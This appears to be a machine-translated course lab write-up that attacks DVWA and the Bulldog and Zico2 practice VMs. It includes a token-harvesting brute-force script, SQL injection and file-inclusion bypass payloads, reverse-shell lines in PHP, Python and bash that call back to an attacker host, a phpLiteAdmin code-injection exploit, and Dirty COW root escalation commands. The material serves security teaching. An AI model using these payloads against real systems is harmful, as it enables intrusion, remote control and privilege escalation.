Safety course design experiment

Keywords: Python security hole

Experiment 1: brute force cracking

Specific requirements: break the login point of the specified IP environment.
A. IP address can be specified;
B. The number of threads required for scanning can be set;
C. Analyze the burst result and its principle, and show the corresponding process.

0x01 low difficulty:

  1. Log in to dvwa range

  2. Reset database

  3. Set difficulty level

  4. Entry point blasting module

  5. Login with user name: admin Password: password is successful, and the picture will be displayed

  6. Assuming we don't know the account and password, we use the burp tool to explode

  7. Log in with any account and password

  8. burp successfully intercepted the packet

  9. Put the packet into the Intruder module

  10. When you come to the Intruder module, you can specify any ip address. There is no need to modify it here

  11. Clear default parameters

    Select only the value of the desired burst parameter

  12. Select attack type Cluster bomb

  13. Add blasting dictionary

  14. Set the burst thread and attack

  15. The scanning results are sorted by Length. Generally, the Length of successful blasting is different from that of failed blasting

    Therefore, the blasting is successful. The user name that can be logged in is admin and the password is password

0x02 medium difficulty:

  1. Set difficulty level

  2. View source code

    From the source code, we can see that there is no blasting error. We need to wait for two seconds. It is the same as the low difficulty operation, but the blasting time is too long

0x03 high difficulty

  1. Set difficulty level
  2. Logging in with any password is much more difficult than the url requested_ token. Yes, the token value is set here. We need a token value for each request, so we need to write a script to complete the blasting.
  3. Grab the logged in packet using burp

  4. Write blasting script
from bs4 import BeautifulSoup
import requests,re

#Construct packet
attack_ip = input('input DVWA where IP:')

header={'Host': f'{attack_ip}',
		'Cache-Control': 'no-cache, must-revalidate',
	    'If-None-Match': "307-52156c6a290c0",
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
		'Referer': f'http://{attack_ip}/dvwa/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate',
		'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
		'Cookie': 'security=high; PHPSESSID=ajvk9ihkgjv6ei38pvigeqd403'}
requrl = f"http://{attack_ip}/dvwa/vulnerabilities/brute/index.php"
def get_token(URL,header):
	#req = urllib.Request(url=URL,headers=header)
	response = requests.get(url=URL,headers=header)
	print (response.status_code,end='  ')
	the_page = response.text
	# print(the_page)
	print (len(the_page))
	#Get the token value using a regular expression
	token = re.findall(r"user_token.*?value='(.*?)'",the_page)
	# print(token[0])
	return token[0]

user_token = get_token(requrl,header)

for line in open('pass.txt'):
	URL = f"http://{attack_ip}/dvwa/vulnerabilities/brute/index.php"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	# print(URL)
	i = i+1
	print (i,'admin',line.strip(),end = ' ')
	user_token = get_token(URL,header)

And put the password dictionary into the path where the script is located

5. Run script and brute force crack

According to the returned Length value, it can be seen that the brute force cracking is successful, so the password is password

Experiment 2: SQL injection

Specific requirements: use SQL injection vulnerability to read and decrypt the database account password.
A. Obtain the database version of the tested host;
B. Obtain database name, table name, column name and data in the database;
C. Crack encrypted data.

0x01 low difficulty:

  1. Set injection difficulty

  2. Production environment:
    Enter the id value to return the corresponding user

    You can see the user name and password corresponding to id 1 (you can also see the corresponding user name by entering id 2, 3, 4, etc.)

  3. Determine whether there is injection and determine the injection type

    It can be roughly seen from the error message that it is a single quotation mark character type

Validate sql injection

1' and '1'='1
1' and '1'='2

Therefore, it is judged that there is single quote character sql injection here
Check the source code to verify the results of our guess

  1. Determine the number of injected fields
1' order by 2#

1' order by 3#

You can see that the number of injected fields is 2

  1. Judge the display position
1' union select 1,2#

  1. View current database
-1' union select 1,database()#

  1. View all tables in the current database
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

  1. View all the columns in the users table
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'#

  1. You can query the data or view it with F12 to make it more complete
1' union select group_concat(user),group_concat(password) from users#

10. The MD5 decryption website can decrypt one by one
MD5 online decryption

0x02 medium difficulty:

  1. Set difficulty level

  2. Enable burp to intercept packets

    At this time, there is no manual input of low-level difficulty. It has been changed to option. We use burp to grab packets and modify data

  3. After catching the data packet, right-click to throw the data packet into the Repeater module (it is convenient for us to repeatedly view the returned results)

  4. Manually modify the value at id for injection
    The following operations are the same as low-level difficulty. The injection type is digital injection, and the other operations are the same. Only the current database is queried here

-1 union select 1,database()

0x03 high difficulty:

The method of high-level difficulty is the same as that of low-level difficulty, but the station library separation is realized, which is more secure.
Single quote character injection

Experiment 3: the file contains

Specific requirements: write the file or specify the file name on the tested host in advance, and use the file to read the file on the system server from the web.
A. Test and dig out the loopholes contained in the file;
B. Show the process of vulnerability contained in the document and analyze its principle;
C. The inclusion vulnerability is exploited to read the specified file and obtain the contents of the file.

0x01 low difficulty

  1. Set difficulty level
  2. Here, every time we click a file, we will return to a page. Here is the file contains

    URL Chinese shape? page = in this form, there may be files containing
  3. Enter / etc/passwd to deliberately report an error (the reason why / etc/passwd is used here is because it is a unique file of linux)

    It can be seen from the error message that the host is a windows operating system, and the absolute path is revealed
  4. Absolute path file contains
    4.1 the file contains C:/boot.ini (a file specific to Windows operating system, and C:\windows\repair\sam file is also acceptable)

4.2 write phpinfo.txt file (the content is php code) in the root directory of the website

File contains successfully
Access the txt file and find that the file contains vulnerabilities. First execute the code in the file, which has nothing to do with the file type. If there is no code, the information in the file will be displayed

4.3 including non code files


  1. Relative path file contains
    5.1 go back to the www / directory and include the phpinfo.txt file

    You can know from the error information
Current directory: C:\phpStudy\PHPTutorial\WWW\dvwa\vulnerabilities\fi\
#.. / Yes returns to the previous directory
 Go back to level 3 Directory:../../../
After returning the three-level Directory: C:\phpStudy\PHPTutorial\WWW\   (Previously created phpinfo.txt (in current directory)

5.2 return the C: \ directory and include boot.ini

6. Remote file contains
6.1 switch to the root directory of the website (kali_linux host ip=, which acts as the victim and writes the rebound shell script on the host)

cd /var/www/html

6.2 scripting

vi shell.php

#The ip here is the attacker's ip. You can clone a kali as the attacker's host and point out the port at will
<?php $sock=fsockopen("",5555);exec("/bin/sh -i <&3 >&3 2>&3")?>

6.3 enable http service

systemctl start apache2.service

6.4 the attacker's host starts listening (ip=, the ip filled in the above script)

6.5 shell.php on the remote kali host

6.6 connection response
The connection may not succeed due to environmental problems, but you can see a connection response

  1. Pseudo protocol contains (not required in the experimental content, you can do it)
    7.1 use the filter protocol of php to read the code in the file and display it in the form of bash64

The obtained content is analyzed base64 decoding , get the source code

7.2 pseudo protocol php://input Enter the code to execute and submit the parameters in POST mode
Use burp to capture and modify packets. Let go

Get php version and information page

0x02 medium difficulty

  1. Set difficulty level
  2. Looking at the source code, you can see that these symbols are filtered, which has no impact on the inclusion of absolute paths, but has an impact on the inclusion of relative paths and remote files, but we can bypass them
Bypass method: (double write bypass),After filtering the characters inserted in the middle, the rest will be spliced into the required characters)
htthttp://p://    -->  http://
hthttps://tps://  -->  https://
..././            -->  ../
...\.\            -->  ..\
  1. The relative path contains phpinfo.txt

    Here is only one example. The other methods are the same as those of low difficulty, but double write bypass is added

0x03 high difficulty

  1. Select difficulty level
  2. As can be seen from the source code, only the file: / / / pseudo protocol can be used for inclusion
  3. file: / / / include pseudo protocol\phpStudy\PHPTutorial\WWW\phpinfo.txt

Experiment 4: bulldog actual combat comprehensive experiment

Specific requirements: from obtaining ip, port and service to taking control of the attacked host.
A. Use tools to obtain ip, port and service;
B. According to the business functions provided by web services, the command execution vulnerabilities are excavated;
C. Command execution vulnerability is used to obtain control of the attacked host.

0x01 environment

Target ip:
kali ip:

  1. Decompression target
  2. Open in virtual machine

    Select the extracted file
  3. Start the target
    The network adapters should be consistent with kali and set to NAT mode. Click ▶ Target, open successfully

0x02 target penetration

1, Information collection

  1. Host discovery
nmap -sn

Scan the IP of the target bulldog:

  1. Port scan
masscan --rate=10000 --ports 0-65535

You can see that three ports 80, 8080 and 23 are open

  1. Detailed scan
nmap -T4 -sV -O -p 80,8080,23

You can scan out the service corresponding to the port, as well as the python environment and linux operating system

  1. dirb for directory scanning

  1. Website fingerprint identification

  1. Visit every accessible page in the website to get important information
    6.1 Homepage

    6.2 click the information in the website to find the files in the notice / directory

    6.3 it is found that admin / is a login point, where our ideas can be used for sql injection, brute force cracking, etc. (this page is obtained through the previous directory scan)

    6.4 if you find a shell page that needs to be verified, you may need to log in to the admin / login point found above to access it (this page is also obtained through the previous directory scan)

2, Vulnerability mining

  1. Check the source code in F12 on the / dev page and find that there is a ciphertext encrypted by MD5

  2. Decrypt
    MD5 decryption website

    Get user Password: bulldog
    Get user Password: bulldoglover
    (when logging in, you find that you want to remove the following mailbox, and only log in with Nick and Sarah)

  3. Log in and log in successfully

  4. Accessing the shell page
    However, no useful information was found in the logged in web page. Remember that there is a shell page requiring authorization where the information was collected. Visit it again and visit it successfully

Command Execution Vulnerability

  1. This page was found to be a command execution page
    And can only execute the given command
  2. However, we found a command execution vulnerability by executing the command PWD & & uname - A. We can display the kernel of the linux operating system using the unguarded uanme command

3, Rebound shell

Method 1:

  1. Write rebound shell script under linux host
    The reason why this script is a python type script: it is found that there is a python environment on the host during the previous information collection, and the shell script can also try it
#Rebound the shell to port 1234 of the host (the ip of the host kali_linux)
import socket,subprocess,os

2. Open a temporary http service in python under the path where the script is located

python -m SimpleHTTPServer 8080

3. Use the wget command to download to the target host
Note the access port here. The port is the port where python opens the http service

Check that the rebound shell script has been downloaded to the server through ls

4. The Linux host starts listening on port 1234

nc -vnlp 1234

5. Run the rebound shell script and find that the linux host gets the shell

(you can also write the rebound shell script one by one to the target host through the echo command, and then run it directly in python to rebound the shell)
Method 2:

  1. Turn on listening

  2. Execute shell commands directly

echo 'bash -i >& /dev/tcp/ 0>&1' | bash

3. Successful rebound

4, Local rights

  1. View the current user, current path, kernel information, etc
  2. Find useful information in the / home directory

  3. If garbled code is found, use the strings command to view it
    The strings command is used to extract and display text strings in non text files

    Found a string of passwords
  4. python opens a standard shell
python -c 'import pty;pty.spawn("/bin/bash")'

5. Use improper configuration to successfully raise rights

Experiment 5: zico actual combat comprehensive experiment

Specific requirements: from obtaining ip, port and service to taking control of the attacked host.
A. Use tools to obtain ip, port and service;
B. Enter the database according to the weak problems of the login point;
C. The combination of code execution in the database and file inclusion vulnerabilities is used to obtain the control right of the attacked host.

0x01 environment

Target ip:
kali ip:

  1. Decompression target

  2. Open in virtual machine

    Select the extracted file

  3. Start the target
    The network adapters should be consistent with kali and set to NAT mode. Click ▶ Target, open successfully

0x02 target penetration

1, Information collection

  1. Host discovery
arp-scan -l

The ip of the target zico2 scanned:

  1. Port scan
masscan --rate=10000 --ports 0-65535

You can see that four ports 111, 22, 80, 59228 are open

  1. Detailed scan
nmap -T4 -sV -O -p 111,22,80,59228

The service corresponding to the port can be scanned, and it is a linux operating system

  1. dirb for directory scanning

  1. Website fingerprint identification

  1. Visit every accessible page in the website to get important information
    6.1 Homepage

    6.2 access / dbadmin page (the path of the current web page obtained from the previous directory scan)

    Click in and find that you use the phpLiteAdmin tool to manage the database page

2, Vulnerability mining

File contains vulnerability

  1. When viewing the home page of the website, I found that clicking this button below will jump to another page

    Jump to this page. From the characteristics of the url (. php?page =), you can see that there may be a File Inclusion Vulnerability here

  1. Determine whether there is a File Inclusion Vulnerability

    It can be seen that there is a File Inclusion Vulnerability here (which will be used later)

phpLiteAdmin version vulnerability

  1. You can find a version vulnerability in phpLiteAdmin
searchsploit phpLiteadmin 1.9.3

You can also search on the web page
Web vulnerability Library

  1. View version vulnerability details
    We can see that the default login password here is admin

    The following is the details of the penetration steps. We will reproduce the vulnerabilities according to the documents later
└─# cat /usr/share/exploitdb/exploits/php/webapps/24044.txt
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - -
# Vendor Homepage:
# Vendor Status: Informed
# Software Link:
# Version: 1.9.3
# Tested on: Windows and Linux


phpliteadmin.php#1784: 'Creating a New Database' => 
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',

An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.

Proof of Concept:

1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Hex preview:

2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview:

3. Now we run hack.php



  1. Try to log in with the default password admin, and the login is successful

  2. For simplicity, use the created database shell.php to delete the data in the shell table first

  3. Insert the page we want to test (phpinfo page) into the shell table

    Successfully created

  4. The phpinfo page was successfully accessed by exploiting the File Inclusion Vulnerability found earlier

3, Exploit:

  1. In Kali_ The Linux host writes the rebound shell script and puts the script in the root directory of the apache website (/ var/www/html)
    Attention path
<?php $sock=fsockopen("",5555);exec("/bin/sh -i <&3 >&3 2>&3")?>

  1. Open http service
systemctl start apache2.service

  1. Delete the original code as in the previous steps
  2. Insert the command to download the rebound shell script and execute the script (which can be executed later by using the file included)
<?php system("wget -O /tmp/shell.php;php /tmp/shell.php");?>

Successfully inserted

  1. kali_ Enable listening on Linux host
nc -vnlp 5555

6. Use the file containing vulnerability to execute system commands

7. Get the shell

4, Local rights

  1. python opens a standard shell
python -c 'import pty;pty.spawn("/bin/bash")'

  1. View current basic information
whoami;id;pwd;uname -a

You can see that this is the Ubuntu operating system

  1. View Ubuntu version information
Ubuntu 12.04.5 LTS

It is found that the version is Ubuntu 12.04.5 LTS, which is very good because it is suitable for dirty cattle lifting rights
Supplement: it can be used for the version of dirty cattle lifting right

  1. kali opens the new terminal, puts the dirty cow script into the root directory of the website (/ var/www/html), and grants 777 permission (since we have started the http service in the previous steps, we don't need to start the http service again here)
chmod 777 dirty.c

  1. Switch the target to the / tmp directory and download the dirty cow script

  1. Compile dirty cow script
gcc -pthread dirty.c -o dirty -lcrypt

  1. Execute the script to get the user: firepart and password: 123456
./dirty 123456

Finally, you need to execute the command mv /tmp/passwd.bak /etc/passwd to restore the original root user

  1. Switch user firepart

    Users get administrator privileges

  2. View flag

  3. Restore the root user and clean up the traces

mv /tmp/passwd.bak /etc/passwd

Penetration complete

Posted by arun4444 on Tue, 12 Oct 2021 11:11:57 -0700